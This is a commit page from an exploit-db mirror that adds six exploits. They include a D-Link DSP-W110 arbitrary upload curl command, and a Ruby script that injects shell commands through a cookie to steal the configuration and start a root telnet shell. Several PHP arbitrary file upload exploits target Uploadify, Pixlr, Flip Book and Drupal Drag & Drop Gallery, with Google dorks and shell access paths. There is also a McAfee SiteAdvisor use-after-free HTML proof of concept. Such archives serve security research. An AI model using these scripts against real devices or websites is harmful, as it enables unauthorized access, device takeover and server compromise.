bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2015-07-02

Browse source 
6 new exploits
This commit is contained in:
Offensive Security 2015-07-02 05:01:50 +00:00
parent 7e7d4b0244
commit 2dc4d37f0f
7 changed files with 490 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

6
files.csv
View file

@ -33793,3 +33793,9 @@ id,file,description,date,author,platform,type,port
37447,platforms/asp/webapps/37447.txt,"C2Box 4.0.0(r19171) - CSRF Vulnerability",2015-06-30,"Wissam Bashour",asp,webapps,0
37448,platforms/multiple/remote/37448.rb,"Adobe Flash Player Drawing Fill Shader Memory Corruption",2015-06-30,metasploit,multiple,remote,0
37449,platforms/hardware/webapps/37449.txt,"Polycom RealPresence Resource Manager < 8.4 - Multiple Vulnerabilities",2015-06-30,"SEC Consult",hardware,webapps,0
37450,platforms/php/webapps/37450.txt,"Amazon S3 Uploadify Script 'uploadify.php' Arbitrary File Upload Vulnerability",2012-06-23,"Sammy FORGIT",php,webapps,0
37451,platforms/php/webapps/37451.txt,"SilverStripe Pixlr Image Editor 'upload.php' Arbitrary File Upload Vulnerability",2012-06-23,"Sammy FORGIT",php,webapps,0
37452,platforms/php/webapps/37452.txt,"WordPress Flip Book 'php.php' Arbitrary File Upload Vulnerability",2012-06-23,"Sammy FORGIT",php,webapps,0
37453,platforms/php/webapps/37453.php,"Drupal Drag & Drop Gallery 'upload.php' Arbitrary File Upload Vulnerability",2012-06-25,"Sammy FORGIT",php,webapps,0
37454,platforms/hardware/webapps/37454.txt,"D-Link DSP-W w110 v1.05b01 - Multiple Vulnerabilities",2015-07-01,DNO,hardware,webapps,0
37456,platforms/windows/dos/37456.html,"McAfee SiteAdvisor 3.7.2 (firefox) Use After Free PoC",2015-07-01,"Marcin Ressel",windows,dos,0

Can't render this file because it is too large.

168
platforms/hardware/webapps/37454.txt Executable file
View file

@ -0,0 +1,168 @@
# Exploit Title: D-Link DSP-W Arbitrary Arbitrary file upload
# Date: 30/06/2015
# Exploit Author: DNO
# Vendor Homepage: [link]
# Version: w110 v1.05b01
# Tested on: linux
# CVE : N/A
========================================
the only 'filtering' on this resources appears to be a sprintf()
call which statically prefixes a submitted 'dev' argument with '/www'.
However,
if a HTTP request is performed without a 'dev' argument at all, the
sprintf() call is never reached,
and a fully-qualified path can be provided in the 'path' parameter -
bypassing the upload path restriction.
***************
# Upload arbitrary files to the device.
echo 'Some String' > test.txt
curl \
-X POST \
-i \
-F name=@test.txt \
--http1.0 \
'192.168.1.3/web_cgi.cgi?&request=UploadFile&path=/etc/'
========================================
# Exploit Title: D-Link DSP-W Diagnostic Information " Get info"
# Date: 30/06/2015
# Exploit Author: DNO
# Version: w110 v1.05b01
# Tested on: linux
# CVE : N/A
========================================
Severity Level:
===============
High
===============
Patches made to lighttpd by the vendor of this device allows an attacker to
query the device, without authentication, for the following information:
# Current WLAN SSIDs
# Current WLAN channels
# LAN and WAN MAC addressing
# Current firmware version information
# Hardware version information
Although not sensitive information, it may allow for identification of
devices running vulnerable firmware versions.
=========================================
# Information query.
curl \
192.168.1.3/mplist.txt
========================================
#ruby poc
----
# DSP-W110-Lighttpd PoC.
require 'pp'
require 'optparse'
require 'restclient'
# Set defaults and parse command line arguments
options = {}
options[:addr] = "192.168.0.60"
options[:port] = 80
OptionParser.new do |option|
option.on("--address [ADDRESS]", "Destination hostname or IP") do |a|
options[:addr] = a
end
option.on("--port [PORT]", "Destination TCP port") do |p|
options[:port] = p
end
option.parse!
end
# Define which actions we will be using.
actions = [
{
:name => "Get device information",
:call => "txt_parser",
:path => "mplist.txt",
},
{
:name => "Snatch configuration",
:call => "noop",
:path => "HNAP1",
:cookies => { :cookie => "`cp /etc/co* /www/`" }
},
{
:name => "Fetch configuration",
:call => "conf_writer",
:path => "config.sqlite",
},
{
:name => "Enable telnet (root)",
:call => "noop",
:path => "HNAP1",
:cookies => { :cookie => "`telnetd -l/bin/sh`" }
}
]
def noop(val)
return
end
def txt_parser(txt)
txt.split(/\r?\n/).each do |line|
puts " #{line}"
end
end
def conf_writer(txt)
begin
f = File.open('./config.sqlite', 'wb')
rescue => e
puts "[!] Failed to open config.sqlite for writing #{e.message}"
end
f.write(txt)
f.close
puts "[*] Configuration fetched into 'config.sqlite'"
end
# Iterate over all actions and attempt to execute.
url = "http://#{options[:addr]}:#{options[:port]}"
puts "[!] Attempting to extract information from #{url}"
actions.each do |action|
# Fire the request and ensure a 200 OKAY.
begin
response = RestClient.get(
"#{url}/#{action[:path]}",
{:cookies => action[:cookies]}
)
rescue
puts "[!] Failed to query remote host."
abort
end
if response.code != 200
puts "[-] '#{action[:name]}' failed with response: #{response.code}"
next
end
# Send to the processor.
puts "[*] #{action[:name]} request succeeded."
send(action[:call], response.body())
end
===================================
contact me FB : FB.COM/haker.dyno
Copyright © 2015 /DNO/

64
platforms/php/webapps/37450.txt Executable file
View file

@ -0,0 +1,64 @@
source: http://www.securityfocus.com/bid/54170/info
Amazon S3 Uploadify Script is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
An attacker can exploit this vulnerability to upload arbitrary code and execute it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
Amazon S3 Uploadify Script 1.01 is vulnerable; other versions may also be affected.
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm Sammy FORGIT member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
##################################################
# Description : uploadify-amazon-s3 Arbitrary File Upload Vulnerability
# Version : 1.01
# Link : http://code.google.com/p/uploadify-amazon-s3/
# Software : http://code.google.com/p/uploadify-amazon-s3/downloads/detail?name=uploadify-amazon-s3-101.zip&can=2&q=
# Date : 21-06-2012
# Google Dork : inurl:/files/uploadify/ -google
# Site : 1337day.com Inj3ct0r Exploit Database
# Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr
##################################################
Exploit :
<?php
$uploadfile="lo.php";
$ch = curl_init("http://www.exemple.com/files/uploadify/uploadify.php?folder=/files/uploadify/");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access : http://www.exemple.com/files/uploadify/lo.php
lo.php
<?php
phpinfo();
?>
# Site : 1337day.com Inj3ct0r Exploit Database

64
platforms/php/webapps/37451.txt Executable file
View file

@ -0,0 +1,64 @@
source: http://www.securityfocus.com/bid/54172/info
Pixlr Image Editor is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
An attacker can exploit this vulnerability to upload arbitrary code and execute it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
Pixlr Image Editor 1.0.4 is vulnerable; other versions may also be affected.
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm Sammy FORGIT member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
##################################################
# Description : Silverstripe Modules - Pixlr Image Editor Arbitrary File Upload Vulnerability
# Version : 1.0.4
# Link : http://www.silverstripe.org/pixlr-image-editor-module/
# Software : http://www.silverstripe.org/assets/modules/stable/svn.github.com-silverstripe-pixlr.git-r54.tar.gz
# Date : 21-06-2012
# Google Dork : not discover
# Site : 1337day.com Inj3ct0r Exploit Database
# Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr
##################################################
Exploit :
<?php
$uploadfile="lo.php";
$ch = curl_init("http://www.exemple.com/silverstripe/pixlr/thirdparty/supa/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access : http://www.exemple.com/silverstripe/pixlr/thirdparty/supa/data/lo.php
lo.php
<?php
phpinfo();
?>
# Site : 1337day.com Inj3ct0r Exploit Database

64
platforms/php/webapps/37452.txt Executable file
View file

@ -0,0 +1,64 @@
source: http://www.securityfocus.com/bid/54173/info
Flip Book is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
An attacker can exploit this vulnerability to upload arbitrary code and execute it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
Flip Book 1.0 is vulnerable; other versions may also be affected.
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm Sammy FORGIT member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
##################################################
# Description : Wordpress Plugins - Flip Book Arbitrary File Upload Vulnerability
# Version : 1.0
# link : http://codecanyon.net/item/flip-book-wordpress-plugin/152641
# Price : 30$
# Date : 22-06-2012
# Google Dork : inurl:/wp-content/plugins/flipbook/
# Site : 1337day.com Inj3ct0r Exploit Database
# Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr
##################################################
Exploit :
<?php
$uploadfile="lo.php";
$ch = curl_init("http://www.exemple.com/wordpress/wp-content/plugins/flipbook/php.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('qqfile'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access : http://www.exemple.com/wordpress/wp-includes/fb-images/lo.php
lo.php
<?php
phpinfo();
?>
# Site : 1337day.com Inj3ct0r Exploit Database

24
platforms/php/webapps/37453.php Executable file
View file

@ -0,0 +1,24 @@
source: http://www.securityfocus.com/bid/54179/info
Drag & Drop Gallery is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
An attacker can exploit this vulnerability to upload arbitrary code and execute it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
Drag & Drop Gallery 6.X-1.5 is vulnerable; other versions may also be affected.
<?php
$uploadfile="db.php.gif";
$uploadfile2="lo.php.gif";
$ch = curl_init("http://www.example.com/drupal/sites/all/modules/dragdrop_gallery/upload.php?nid=1&filedir=/drupal/sites/all/modules/dragdrop_gallery/");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('user_file[0]'=>"@$uploadfile",
'user_file[1]'=>"@$uploadfile2"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

100
platforms/windows/dos/37456.html Executable file
View file

@ -0,0 +1,100 @@
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=windows-1250">
<meta name="generator" content="PSPad editor, www.pspad.com">
<title>McAfee SiteAdvisor 3.7.2 for firefox Use After Free Poc</title>
</head>
<body>
<script>
/*
Title: McAfee SiteAdvisor 3.7.2 (firefox) Use After Free
Author: Marcin Ressel
Twitter: https://twitter.com/m_ressel
NPMcFFPlg32.dll
McAfee SiteAdvisor 3.7.2
Tested on: Windows 8.1 (x64) and firefox 38.0.5
Homepage: https://www.siteadvisor.com/
Note: this vlun potentiali give us posibility to bruteforce base modules in memory
to bypass ASLR/DEP because the bug doesn't have negative impact to webbrowser proces
i mean firefox will not crash after trigger uaf i McAfee
0:107> !gflag
Current NtGlobalFlag contents: 0x02001800
htg - Enable heap tagging
ust - Create user mode stack trace database
hpa - Place heap allocations at ends of pages
0:107> g
(1d68.1b54): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=24b9efec ebx=00000000 ecx=00000000 edx=003bf030 esi=1a978ff0 edi=00000001
eip=6f404391 esp=003bf014 ebp=003bf054 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210246
NPMcFFPlg32!CreateFFScriptable+0x141:
6f404391 8b4008 mov eax,dword ptr [eax+8] ds:002b:24b9eff4=????????
...
6f40437a 8b02 mov eax,dword ptr [edx]
6f40437c 85c0 test eax,eax
6f40437e 7402 je NPMcFFPlg32!CreateFFScriptable+0x132 (6f404382)
6f404380 8b00 mov eax,dword ptr [eax]
6f404382 8b4808 mov ecx,dword ptr [eax+8]
6f404385 8b4004 mov eax,dword ptr [eax+4]
6f404388 49 dec ecx
6f404389 234a08 and ecx,dword ptr [edx+8]
6f40438c 8b0488 mov eax,dword ptr [eax+ecx*4]
6f40438f 8b00 mov eax,dword ptr [eax]
6f404391 8b4008 mov eax,dword ptr [eax+8] ds:002b:24b9eff4=????????
6f404394 eb45 jmp NPMcFFPlg32!CreateFFScriptable+0x18b (6f4043db)
6f404396 8d45d0 lea eax,[ebp-30h]
6f404399 50 push eax
6f40439a e8d10e0000 call NPMcFFPlg32!CreateFFScriptable+0x1020 (6f405270)
6f40439f 8bd0 mov edx,eax
6f4043a1 8b02 mov eax,dword ptr [edx]
6f4043a3 85c0 test eax,eax
6f4043a5 7402 je NPMcFFPlg32!CreateFFScriptable+0x159 (6f4043a9)
6f4043a7 8b00 mov eax,dword ptr [eax]
6f4043a9 8b4808 mov ecx,dword ptr [eax+8]
6f4043ac 8b4004 mov eax,dword ptr [eax+4]
6f4043af 49 dec ecx
6f4043b0 234a08 and ecx,dword ptr [edx+8]
6f4043b3 8b3488 mov esi,dword ptr [eax+ecx*4]
6f4043b6 8d45c4 lea eax,[ebp-3Ch]
6f4043b9 50 push eax
6f4043ba e8b10e0000 call NPMcFFPlg32!CreateFFScriptable+0x1020 (6f405270)
6f4043bf 8bd0 mov edx,eax
...
*/
var win = null;
function crash()
{
var doc = win.document;
var obj = doc;
win.close();
for(var p in obj)
{
if(typeof obj[p] == 'string')
{
try{ obj[p] = "CCCC"; }catch(err){}
}
}
}
win = window.open('data:text/html,','','width=20,height=20'); //you need disable popupBlocker
win.onload = crash;
</script>
</body>
</html>